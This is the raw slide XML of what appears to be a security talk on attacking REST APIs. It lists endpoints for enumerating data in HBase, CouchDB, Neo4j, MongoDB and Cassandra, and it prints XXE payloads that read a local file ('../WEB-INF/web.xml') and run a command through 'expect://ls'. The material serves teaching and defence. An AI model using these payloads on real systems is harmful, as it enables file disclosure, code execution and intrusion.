              <a:t>Find the nodes in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>HBase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Cluster:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://host:9000/status/cluster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find all the tables in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Hbase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Cluster:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://host:9000/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Returns:  customer and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>profile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find a description of a particular table’s schema(pick one from the prior link):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://host:port/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>profile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/schema</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312901213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Couch DB REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="8229600" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find all databases in the Couch DB:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://host:5984/_all_dbs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find all the documents in the Couch DB:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://host:5984/{db_name}/_all_docs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="426394284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Neo4j REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="8229600" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find version and extension information in the Neo4j DB:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://host:7474/db/data/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="391342237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Mongo DB REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="8229600" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find all databases in the Mongo DB:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://host:27080/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://host:27080/api/1/databases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find all the collections under a named database ({</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>db_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>}) in the Mongo DB:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://host:27080/api/1/database/{db_name}/collections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237522336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Cassandra.io REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="8229600" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>keyspaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in the Cassandra.io DB:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://host:port/1/keyspaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find all the column families in the Cassandra.io DB:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://host:port/1/columnfamily/{keyspace_name}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297792624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Goals and Main Point</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10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Originally a 2 hour presentation so we will only be focusing on identifying remote code execution and data exfiltration vulnerabilities through REST APIs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remember that a REST API is nothing more than a web application which follows a structured set of rules.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So all of the previous application vulnerabilities still apply: SQL Injection, XSS, Direct Object Reference, Command Injection, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you have both publically exposed and internal REST APIs then you probably have some remote code execution and data exfiltration issues.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19370512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Input Types and Interfaces</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Does anyone know what the main input types are to REST interfaces?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159350186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Input Types and Interfaces</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Does anyone know what the main input types are to REST interfaces?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XML and JSON</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144423575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Related Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When you think of XML--what vulnerabilities come to mind?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413264002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Related Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When you think of XML--what vulnerabilities come to mind?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXE (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eXternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> XML Entity Injection) / SSRF (Server Side Request Forgery)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSLT Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XDOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XML Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML Serialization </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="406631613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smtClean="0"/>
              <a:t>XXE (File Disclosure and Port Scanning)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="838200"/>
            <a:ext cx="8686800" cy="5867400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most REST interfaces take raw XML to de-serialize into method parameters of request handling classes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XXE Example when the name element is echoed back in the HTTP response to the posted XML which is parsed whole by the REST API:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;?xml encoding=“utf-8” ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;!DOCTYPE Customer [&lt;!ENTITY y SYSTEM ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>../WEB-INF/web.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’&gt; ]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;Customer&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;&amp;y;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/Customer&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>*See Attacking &lt;?xml?&gt; processing by Nicolas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Gregoire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Agarri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) and XML Out-of-Band Data Retrieval by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Timur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Yunusov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and Alexey </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Osipov</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="358598524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XXE Today</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>At one time most REST frameworks were vulnerable to XXE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But newer versions have patched this vulnerability.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47007928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smtClean="0"/>
              <a:t>XXE (Remote Code Execution)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="838200"/>
            <a:ext cx="8686800" cy="5867400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most REST interfaces take raw XML to de-serialize into method parameters of request handling classes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XXE Example when the name element is echoed back in the HTTP response to the posted XML which is parsed whole by the REST API:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;?xml encoding=“utf-8” ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;!DOCTYPE Customer [&lt;!ENTITY y SYSTEM ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>expect://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt; ]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;Customer&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;&amp;y;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/Customer&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>*See XXE: advanced exploitation, d0znpp, ONSEC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>*expect protocol requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pexpect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>module to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>be loaded in PHP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
